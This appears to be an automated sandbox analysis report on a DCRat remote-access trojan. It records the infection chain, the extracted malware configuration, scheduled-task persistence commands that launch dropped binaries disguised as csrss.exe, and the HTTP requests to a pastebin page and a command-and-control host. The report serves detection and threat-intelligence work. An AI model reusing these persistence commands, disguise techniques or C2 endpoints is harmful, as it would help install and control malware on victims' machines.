Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CRf9KBk4ra.exe

Overview

General Information

Sample name:CRf9KBk4ra.exe
renamed because original name is a hash value
Original sample name:8b7b1adcb1ea8edff9888558ef898054.exe
Analysis ID:1583170
MD5:8b7b1adcb1ea8edff9888558ef898054
SHA1:65f2ff2c3a00621a5eaa1a9e89662950659222c2
SHA256:356c2aed44aef4579e0db1c31f4162e9dfa89f04589ddb14211afbbdf621a61b
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Creates processes via WMI
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • CRf9KBk4ra.exe (PID: 7316 cmdline: "C:\Users\user\Desktop\CRf9KBk4ra.exe" MD5: 8B7B1ADCB1EA8EDFF9888558EF898054)
    • wscript.exe (PID: 7356 cmdline: "C:\Windows\System32\WScript.exe" "C:\hyperBrowsermonitorNet\BYhHcZyz.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7436 cmdline: C:\Windows\system32\cmd.exe /c ""C:\hyperBrowsermonitorNet\cyFyzmRWbIwTjqG.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • serverwinCommon.exe (PID: 7480 cmdline: "C:\hyperBrowsermonitorNet\serverwinCommon.exe" MD5: BB31080A1AC450BC92BE05ED245BBCEB)
          • schtasks.exe (PID: 7532 cmdline: schtasks.exe /create /tn "MImOLbdPzolqACtrpVpcRPdPWZgM" /sc MINUTE /mo 5 /tr "'C:\Recovery\MImOLbdPzolqACtrpVpcRPdPWZg.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7552 cmdline: schtasks.exe /create /tn "MImOLbdPzolqACtrpVpcRPdPWZg" /sc ONLOGON /tr "'C:\Recovery\MImOLbdPzolqACtrpVpcRPdPWZg.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7568 cmdline: schtasks.exe /create /tn "MImOLbdPzolqACtrpVpcRPdPWZgM" /sc MINUTE /mo 6 /tr "'C:\Recovery\MImOLbdPzolqACtrpVpcRPdPWZg.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7584 cmdline: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Recovery\csrss.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7600 cmdline: schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\csrss.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7616 cmdline: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Recovery\csrss.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7632 cmdline: schtasks.exe /create /tn "MImOLbdPzolqACtrpVpcRPdPWZgM" /sc MINUTE /mo 6 /tr "'C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7648 cmdline: schtasks.exe /create /tn "MImOLbdPzolqACtrpVpcRPdPWZg" /sc ONLOGON /tr "'C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7664 cmdline: schtasks.exe /create /tn "MImOLbdPzolqACtrpVpcRPdPWZgM" /sc MINUTE /mo 12 /tr "'C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • cmd.exe (PID: 7696 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KPLr9FsY2g.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • w32tm.exe (PID: 7740 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
            • csrss.exe (PID: 8044 cmdline: "C:\Recovery\csrss.exe" MD5: BB31080A1AC450BC92BE05ED245BBCEB)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"SCRT": "{\"Y\":\"*\",\"b\":\",\",\"o\":\"#\",\"I\":\">\",\"S\":\";\",\"B\":\"|\",\"Q\":\"%\",\"l\":\" \",\"9\":\"!\",\"R\":\"`\",\"L\":\"~\",\"m\":\"@\",\"J\":\"$\",\"v\":\"^\",\"z\":\"(\",\"d\":\"<\",\"i\":\".\",\"y\":\"&\",\"c\":\"_\",\"N\":\"-\",\"h\":\")\"}", "PCRT": "{\"3\":\"#\",\"p\":\"!\",\"J\":\"-\",\"U\":\"`\",\"K\":\"~\",\"9\":\"$\",\"B\":\"<\",\"M\":\")\",\"4\":\">\",\"F\":\",\",\"5\":\"_\",\"T\":\"^\",\"Y\":\"|\",\"x\":\"*\",\"H\":\".\",\"a\":\"&\",\"D\":\"%\",\"e\":\"(\",\"W\":\" \",\"Q\":\"@\",\"E\":\";\"}", "TAG": "", "MUTEX": "DCR_MUTEX-rHj2kN6jEI3wEL9YYclh", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.1697465797.0000000002537000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
    00000014.00000002.1797616767.00000000032AD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
      00000014.00000002.1797616767.0000000003271000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        00000015.00000002.1829922559.0000000002BD1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
          00000004.00000002.1697465797.00000000023A1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            19.2.MImOLbdPzolqACtrpVpcRPdPWZg.exe.30b6270.1.raw.unpackINDICATOR_SUSPICIOUS_References_SecTools_B64EncodedDetects executables referencing many base64-encoded IR and analysis tools namesditekSHen
            • 0x164d4:$s4: cHJvY2V4cA
            • 0x16515:$s5: cHJvY2V4cDY0
            • 0x16411:$s12: d2lyZXNoYXJr
            • 0x162ba:$s23: ZG5zcHk
            • 0x162c3:$s25: aWxzcHk
            • 0x162cc:$s26: ZG90cGVla

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Files With System Process Name In Unsuspected Locations
            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\hyperBrowsermonitorNet\serverwinCommon.exe, ProcessId: 7480, TargetFilename: C:\Recovery\csrss.exe
            Sigma detected: System File Execution Location Anomaly
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Recovery\csrss.exe" , CommandLine: "C:\Recovery\csrss.exe" , CommandLine|base64offset|contains: , Image: C:\Recovery\csrss.exe, NewProcessName: C:\Recovery\csrss.exe, OriginalFileName: C:\Recovery\csrss.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KPLr9FsY2g.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7696, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Recovery\csrss.exe" , ProcessId: 8044, ProcessName: csrss.exe
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\hyperBrowsermonitorNet\BYhHcZyz.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\hyperBrowsermonitorNet\BYhHcZyz.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\CRf9KBk4ra.exe", ParentImage: C:\Users\user\Desktop\CRf9KBk4ra.exe, ParentProcessId: 7316, ParentProcessName: CRf9KBk4ra.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\hyperBrowsermonitorNet\BYhHcZyz.vbe" , ProcessId: 7356, ProcessName: wscript.exe

            Persistence and Installation Behavior

            barindex
            Sigma detected: Schedule system process
            Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Recovery\csrss.exe'" /f, CommandLine: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Recovery\csrss.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\hyperBrowsermonitorNet\serverwinCommon.exe", ParentImage: C:\hyperBrowsermonitorNet\serverwinCommon.exe, ParentProcessId: 7480, ParentProcessName: serverwinCommon.exe, ProcessCommandLine: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Recovery\csrss.exe'" /f, ProcessId: 7584, ProcessName: schtasks.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-02T06:37:09.091579+010020341941A Network Trojan was detected192.168.2.449731141.8.192.16480TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: CRf9KBk4ra.exeAvira: detected
            Antivirus detection for URL or domain
            Source: http://a1068999.xsph.ru/L1nc0In.php?dJpokCi4eIn08fwF5fxU0YsMAMpZQ=HlIVmDvSw9kuH3D6DEv6BSc&FEbcnYXInwA=sn2&7f588507da462c66c8d7e4bf263478da=811e4ff91d24acd2ff809d0fba0acc36&c6a8234adf537449ee48f442440ce8cf=wMxMTZzImY1EzMiFmMzYWY1UmY5YjYlNGNlhTZ0IjM2YjY3MTOmdjM&dJpokCi4eIn08fwF5fxU0YsMAMpZQ=HlIVmDvSw9kuH3D6DEv6BSc&FEbcnYXInwA=sn2Avira URL Cloud: Label: malware
            Source: http://a1068999.xsph.ruAvira URL Cloud: Label: malware
            Source: http://a1068999.xsph.ru/Avira URL Cloud: Label: malware
            Source: http://a1068999.xsph.ru/L1nc0In.php?dJpokCi4eIn08fwF5fxU0YsMAMpZQ=HlIVmDvSw9kuH3D6DEv6BSc&FEbcnYXInwAvira URL Cloud: Label: malware
            Antivirus detection for dropped file
            Source: C:\Recovery\MImOLbdPzolqACtrpVpcRPdPWZg.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Users\user\AppData\Local\Temp\KPLr9FsY2g.batAvira: detection malicious, Label: BAT/Delbat.C
            Source: C:\Recovery\MImOLbdPzolqACtrpVpcRPdPWZg.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Recovery\csrss.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\hyperBrowsermonitorNet\BYhHcZyz.vbeAvira: detection malicious, Label: VBS/Runner.VPG
            Found malware configuration
            Source: csrss.exe.8044.21.memstrminMalware Configuration Extractor: DCRat {"SCRT": "{\"Y\":\"*\",\"b\":\",\",\"o\":\"#\",\"I\":\">\",\"S\":\";\",\"B\":\"|\",\"Q\":\"%\",\"l\":\" \",\"9\":\"!\",\"R\":\"`\",\"L\":\"~\",\"m\":\"@\",\"J\":\"$\",\"v\":\"^\",\"z\":\"(\",\"d\":\"<\",\"i\":\".\",\"y\":\"&\",\"c\":\"_\",\"N\":\"-\",\"h\":\")\"}", "PCRT": "{\"3\":\"#\",\"p\":\"!\",\"J\":\"-\",\"U\":\"`\",\"K\":\"~\",\"9\":\"$\",\"B\":\"<\",\"M\":\")\",\"4\":\">\",\"F\":\",\",\"5\":\"_\",\"T\":\"^\",\"Y\":\"|\",\"x\":\"*\",\"H\":\".\",\"a\":\"&\",\"D\":\"%\",\"e\":\"(\",\"W\":\" \",\"Q\":\"@\",\"E\":\";\"}", "TAG": "", "MUTEX": "DCR_MUTEX-rHj2kN6jEI3wEL9YYclh", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false}
            Multi AV Scanner detection for dropped file
            Source: C:\Recovery\MImOLbdPzolqACtrpVpcRPdPWZg.exeReversingLabs: Detection: 73%
            Source: C:\Recovery\csrss.exeReversingLabs: Detection: 73%
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeReversingLabs: Detection: 73%
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeReversingLabs: Detection: 73%
            Multi AV Scanner detection for submitted file
            Source: CRf9KBk4ra.exeReversingLabs: Detection: 71%
            Source: CRf9KBk4ra.exeVirustotal: Detection: 57%Perma Link
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\Recovery\MImOLbdPzolqACtrpVpcRPdPWZg.exeJoe Sandbox ML: detected
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeJoe Sandbox ML: detected
            Source: C:\Recovery\MImOLbdPzolqACtrpVpcRPdPWZg.exeJoe Sandbox ML: detected
            Source: C:\Recovery\csrss.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: CRf9KBk4ra.exeJoe Sandbox ML: detected
            Source: CRf9KBk4ra.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: CRf9KBk4ra.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: CRf9KBk4ra.exe
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_0037A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0037A5F4
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_0038B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0038B8E0
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeFile opened: C:\Users\userJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.4:49731 -> 141.8.192.164:80
            Connects to a pastebin service (likely for C&C)
            Source: unknownDNS query: name: pastebin.com
            Source: global trafficTCP traffic: 192.168.2.4:51854 -> 162.159.36.2:53
            Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
            Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
            Source: Joe Sandbox ViewASN Name: SPRINTHOSTRU SPRINTHOSTRU
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: global trafficHTTP traffic detected: GET /raw/GTMsT9mi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: pastebin.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?dJpokCi4eIn08fwF5fxU0YsMAMpZQ=HlIVmDvSw9kuH3D6DEv6BSc&FEbcnYXInwA=sn2&7f588507da462c66c8d7e4bf263478da=811e4ff91d24acd2ff809d0fba0acc36&c6a8234adf537449ee48f442440ce8cf=wMxMTZzImY1EzMiFmMzYWY1UmY5YjYlNGNlhTZ0IjM2YjY3MTOmdjM&dJpokCi4eIn08fwF5fxU0YsMAMpZQ=HlIVmDvSw9kuH3D6DEv6BSc&FEbcnYXInwA=sn2 HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: a1068999.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?dJpokCi4eIn08fwF5fxU0YsMAMpZQ=HlIVmDvSw9kuH3D6DEv6BSc&FEbcnYXInwA=sn2&7f588507da462c66c8d7e4bf263478da=811e4ff91d24acd2ff809d0fba0acc36&c6a8234adf537449ee48f442440ce8cf=wMxMTZzImY1EzMiFmMzYWY1UmY5YjYlNGNlhTZ0IjM2YjY3MTOmdjM&dJpokCi4eIn08fwF5fxU0YsMAMpZQ=HlIVmDvSw9kuH3D6DEv6BSc&FEbcnYXInwA=sn2 HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: a1068999.xsph.ru
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /raw/GTMsT9mi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: pastebin.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?dJpokCi4eIn08fwF5fxU0YsMAMpZQ=HlIVmDvSw9kuH3D6DEv6BSc&FEbcnYXInwA=sn2&7f588507da462c66c8d7e4bf263478da=811e4ff91d24acd2ff809d0fba0acc36&c6a8234adf537449ee48f442440ce8cf=wMxMTZzImY1EzMiFmMzYWY1UmY5YjYlNGNlhTZ0IjM2YjY3MTOmdjM&dJpokCi4eIn08fwF5fxU0YsMAMpZQ=HlIVmDvSw9kuH3D6DEv6BSc&FEbcnYXInwA=sn2 HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: a1068999.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?dJpokCi4eIn08fwF5fxU0YsMAMpZQ=HlIVmDvSw9kuH3D6DEv6BSc&FEbcnYXInwA=sn2&7f588507da462c66c8d7e4bf263478da=811e4ff91d24acd2ff809d0fba0acc36&c6a8234adf537449ee48f442440ce8cf=wMxMTZzImY1EzMiFmMzYWY1UmY5YjYlNGNlhTZ0IjM2YjY3MTOmdjM&dJpokCi4eIn08fwF5fxU0YsMAMpZQ=HlIVmDvSw9kuH3D6DEv6BSc&FEbcnYXInwA=sn2 HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: a1068999.xsph.ru
            Source: global trafficDNS traffic detected: DNS query: pastebin.com
            Source: global trafficDNS traffic detected: DNS query: a1068999.xsph.ru
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 02 Jan 2025 05:37:08 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 02 Jan 2025 05:37:09 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 